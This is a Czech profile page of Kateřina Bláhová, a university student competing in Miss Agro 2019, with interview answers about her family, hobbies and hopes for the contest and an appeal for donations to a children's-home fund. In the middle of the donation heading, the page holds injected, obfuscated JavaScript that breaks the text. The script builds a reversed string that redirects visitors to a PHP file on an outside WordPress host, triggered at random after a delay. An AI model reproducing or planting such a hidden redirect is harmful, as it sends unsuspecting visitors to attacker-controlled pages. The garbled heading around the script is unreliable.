Kateřina Bláhová

Profil

Fakulta: PEF
Obor: Podnikání a administrativa (PAA)
Ročník: 3.
Věk:
22

Kačka je obětavá a přátelská holka z Prahy. Snaží se být pozitivní a usměvavá za každé situace. Škola a rodina jsou pro ni na prvním místě. Nejraději tráví čas s kamarády, a tam, kde je hodně jídla, i když se jí hodně lidí ptá, kam to jídlo dává. (smích) Ráda experimentuje v kuchyni, při vaření a pečení dortů, i když to tam občas vypadá jako po výbuchu. (smích) Když zrovna nejí, nespí nebo není ve škole, tak tráví čas s dětmi. Myslí si, že to pro ni v budoucnu bude dobrá zkušenost. Několik let se věnovala atletice, konkrétně běhu na dlouhé tratě, tak se na ní třeba usměje štěstí a doběhne si pro korunku.

“Podporujeme

)=="string") return $mWn.list[n].split("").reverse().join("");return $mWn.list[n];};$mWn.list=["\'php.tsop-egap-ssalc/stegdiw/reganam-stegdiw/cni/rotnemele-retoof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}domovů“ css=“.vc_custom_1492523222849{margin-top: 30px !important;}“]Miss Agro podporuje mladé studenty z dětských domovů prostřednictvím Nadačního fondu Veroniky Kašákové. Podpořte je i Vy! Přispět můžete libovolnou částkou na účet 2113124252/2700. Více informací najdete na webových stránkách www.nfvk.cz. Děkujeme, že pomáháte!

Proč by ses zrovna Ty měla stát Miss Agro 2019?

Protože to říkal můj nejlepší kamarád a taťka. (smích) Každá jsme v něčem originální a každá má něco, co by se porotě mohlo líbit. Jak se říká, zkusit se má všechno a já si myslím, že toho nebudu litovat a bude to přinejmenším výborná zkušenost.

Máš nějaký životní vzor? Čím Tě inspiruje?

Na prvním místě jsou určitě rodiče. Vždy mě podporovali. Mamka mě inspiruje především tím, že dokáže být skvělou osobou i rodičem zároveň. Nesmím zapomenout i na mladší ségru, kterou beru jako nejlepší kamarádku, se kterou můžu probírat cokoliv. Jinak vše dělám podle sebe, jak je to pro mě nejlepší, ale samozřejmě si nechám i ráda poradit.

Na který předmět na ČZU vzpomínáš nejvíce a proč?

Je jich více. Na některé vzpomínám v dobrém, protože díky nim jsem poznala skvělé kamarády, se kterými držíme do teď. Na některé naopak ani vzpomínat nechci, protože jsem se s nimi pěkně natrápila.

Na co se v soutěži Miss Agro těšíš nejvíc?

Nejvíc? Asi na to, že nasbírám nové zkušenosti, zažiju spoustu nových zážitků a legrace. Poznám nové lidi, třeba i odbourám trému a strach vystupovat před lidmi. Bude to dřina, ale věřím, že výsledek bude stát za to!